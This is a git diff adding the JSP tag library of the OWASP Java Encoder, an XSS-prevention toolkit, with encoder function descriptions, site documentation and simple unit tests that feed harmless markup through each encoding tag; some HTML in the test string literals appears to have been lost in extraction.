for CSS strings. The context must be surrounded by quotation characters. + It is safe for use in both style blocks and attributes in HTML. + + forCssString + forCssString + org.owasp.encoder.Encode + java.lang.String forCssString(java.lang.String) + forCssString(unsafeData) + + + + Encodes for CSS URL contexts. The context must be surrounded by "url()". It + is safe for use in both style blocks and attributes in HTML. Note: this does + not do any checking on the quality or safety of the URL itself. The caller + should insure that the URL is safe for embedding (e.g. input validation) by + other means. + + forCssUrl + forCssUrl + org.owasp.encoder.Encode + java.lang.String forCssUrl(java.lang.String) + forCssUrl(unsafeData) + + + + Performs percent-encoding of a URL according to RFC 3986. The provided + URL is assumed to a valid URL. This method does not do any checking on + the quality or safety of the URL itself. In many applications it may + be better to use java.net.URI instead. Note: this is a + particularly dangerous context to put untrusted content in, as for + example a "javascript:" URL provided by a malicious user would be + "properly" escaped, and still execute. + + forUri + forUri + org.owasp.encoder.Encode + java.lang.String forUri(java.lang.String) + forUri(unsafeData) + + + + Performs percent-encoding for a component of a URI, such as a query + parameter name or value, path or query-string. In particular this + method insures that special characters in the component do not get + interpreted as part of another component. + + forUriComponent + forUriComponent + org.owasp.encoder.Encode + java.lang.String forUriComponent(java.lang.String) + forUriComponent(unsafeData) + + + Encodes for XML and XHTML. + forXml + forXml + org.owasp.encoder.Encode + java.lang.String forXml(java.lang.String) + forXml(unsafeData) + + + + Encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forXmlContent + forXmlContent + org.owasp.encoder.Encode + java.lang.String forXmlContent(java.lang.String) + forXmlContent(unsafeData) + + + Encodes for XML and XHTML attribute content. + forXmlAttribute + forXmlAttribute + org.owasp.encoder.Encode + java.lang.String forXmlAttribute(java.lang.String) + forXmlAttribute(unsafeData) + + + + Encodes data for an XML CDATA section. On the chance that the input + contains a terminating + "]]&gt;", it will be replaced by + &quot;]]&gt;]]&lt;![CDATA[&gt;&quot;. + As with all XML contexts, characters that are invalid according to the + XML specification will be replaced by a space character. Caller must + provide the CDATA section boundaries. + + forCDATA + forCDATA + org.owasp.encoder.Encode + java.lang.String forCDATA(java.lang.String) + forCDATA(unsafeData) + + + + Encodes for a JavaScript string. It is safe for use in HTML + script attributes (such as onclick), script + blocks, JSON files, and JavaScript source. The caller MUST + provide the surrounding quotation characters for the string. + + forJavaScript + forJavaScript + org.owasp.encoder.Encode + java.lang.String forJavaScript(java.lang.String) + forJavaScript(unsafeData) + + \ No newline at end of file diff --git a/jsp/src/site/markdown/index.md b/jsp/src/site/markdown/index.md new file mode 100644 index 0000000..e2c305a --- /dev/null +++ b/jsp/src/site/markdown/index.md @@ -0,0 +1,31 @@ +## OWASP JSP + +The OWASP JSP Encoder is a collection of high-performance low-overhead +contextual encoders that, when utilized correctly, is an effective tool in +preventing Web Application security vulnerabilities such as Cross-Site +Scripting (XSS). + +Please see the [OWASP XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet) +for more information on preventing XSS. + +### JSP Usage + +The JSP Encoder makes the use of the Java Encoder within JSP simple via a TLD that +includes tags and a set of JSP EL functions: + +```xml + + org.owasp.encoder + encoder-jsp + 1.2.3 + +``` + +```JSP +<%@taglib prefix="e" uri="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project" %> + +<%-- ... --%> + +

    Dynamic data via EL: ${e:forHtml(param.value)}

    +

    Dynamic data via tag:

    +``` diff --git a/jsp/src/site/site.xml b/jsp/src/site/site.xml new file mode 100644 index 0000000..dde2b60 --- /dev/null +++ b/jsp/src/site/site.xml @@ -0,0 +1,41 @@ + + + + + + \ No newline at end of file diff --git a/jsp/src/test/java/org/owasp/encoder/tag/EncodingTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/EncodingTagTest.java new file mode 100644 index 0000000..4f49e8b --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/EncodingTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import junit.framework.TestCase; +import org.springframework.mock.web.MockHttpServletRequest; +import org.springframework.mock.web.MockHttpServletResponse; +import org.springframework.mock.web.MockPageContext; +import org.springframework.mock.web.MockServletContext; + +/** + * EncodingTagTest is the base class for all unit tests for the tags. + * This sets up the ServletContext so that tags can be tested. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public abstract class EncodingTagTest extends TestCase { + + protected MockServletContext _servletContext; + protected MockPageContext _pageContext; + protected MockHttpServletRequest _request; + protected MockHttpServletResponse _response; + + /** + * Constructor for the EncodingTagTest + * @param testName the name of the test + */ + public EncodingTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + _servletContext = new MockServletContext(); + _request = new MockHttpServletRequest(); + _response = new MockHttpServletResponse(); + _pageContext = new MockPageContext(_servletContext, _request, _response); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java new file mode 100644 index 0000000..c8e3847 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForCDATATag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForCDATATagTest extends EncodingTagTest { + + public ForCDATATagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForCDATATag. + * This is a very simple test that doesn't fully + * exercise/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForCDATATag instance = new ForCDATATag(); + String value = "
    ]]>
    "; + String expected = "
    ]]]]>
    "; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForCssStringTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForCssStringTagTest.java new file mode 100644 index 0000000..0c9d6e8 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForCssStringTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForCssStringTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForCssStringTagTest extends EncodingTagTest { + + public ForCssStringTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForCssStringTag. + * This is a very simple test that doesn't fully + * exercise/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForCssStringTag instance = new ForCssStringTag(); + String value = "
    "; + String expected = "\\3c div\\3e"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForCssUrlTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForCssUrlTagTest.java new file mode 100644 index 0000000..77936c3 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForCssUrlTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForCssUrlTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForCssUrlTagTest extends EncodingTagTest { + + public ForCssUrlTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForCssUrlTag. + * This is a very simple test that doesn't fully + * exercise/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForCssUrlTag instance = new ForCssUrlTag(); + String value = "\\';"; + String expected = "\\5c\\27;"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected, results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlAttributeTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlAttributeTagTest.java new file mode 100644 index 0000000..3c0c64f --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlAttributeTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForHtmlAttributeTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForHtmlAttributeTagTest extends EncodingTagTest { + + public ForHtmlAttributeTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForHtmlAttributeTag. + * This is a very simple test that doesn't fully + * exercise/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForHtmlAttributeTag instance = new ForHtmlAttributeTag(); + String value = "
    "; + String expected = "<div>"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlContentTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlContentTagTest.java new file mode 100644 index 0000000..ef6e389 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlContentTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForHtmlContentTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForHtmlContentTagTest extends EncodingTagTest { + + public ForHtmlContentTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForHtmlContentTag. + * This is a very simple test that doesn't fully + * exercise/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForHtmlContentTag instance = new ForHtmlContentTag(); + String value = "
    "; + String expected = "<div>"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlTagTest.java new file mode 100644 index 0000000..03897a7 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForHtmlTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForHtmlTagTest extends EncodingTagTest { + + public ForHtmlTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForHtmlTag. + * This is a very simple test that doesn't fully + * exercise/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForHtmlTag instance = new ForHtmlTag(); + String value = "
    "; + String expected = "<div>"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTagTest.java new file mode 100644 index 0000000..bce53a4 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForHtmlUnquotedAttributeTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForHtmlUnquotedAttributeTagTest extends EncodingTagTest { + + public ForHtmlUnquotedAttributeTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForHtmlUnquotedAttributeTag. + * This is a very simple test that doesn't fully + * exercise/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForHtmlUnquotedAttributeTag instance = new ForHtmlUnquotedAttributeTag(); + String value = "
    "; + String expected = "<div> </div>"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptAttributeTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptAttributeTagTest.java new file mode 100644 index 0000000..ad38c07 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptAttributeTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForJavaScriptAttributeTag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForJavaScriptAttributeTagTest extends EncodingTagTest { + + public ForJavaScriptAttributeTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForJavaScriptAttributeTag. + * This is a very simple test that doesn't fully + * exercise/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForJavaScriptAttributeTag instance = new ForJavaScriptAttributeTag(); + String value = "
    \"\'"; + String expected = "
    \\x22\\x27"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptBlockTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptBlockTagTest.java new file mode 100644 index 0000000..75cf97e --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptBlockTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 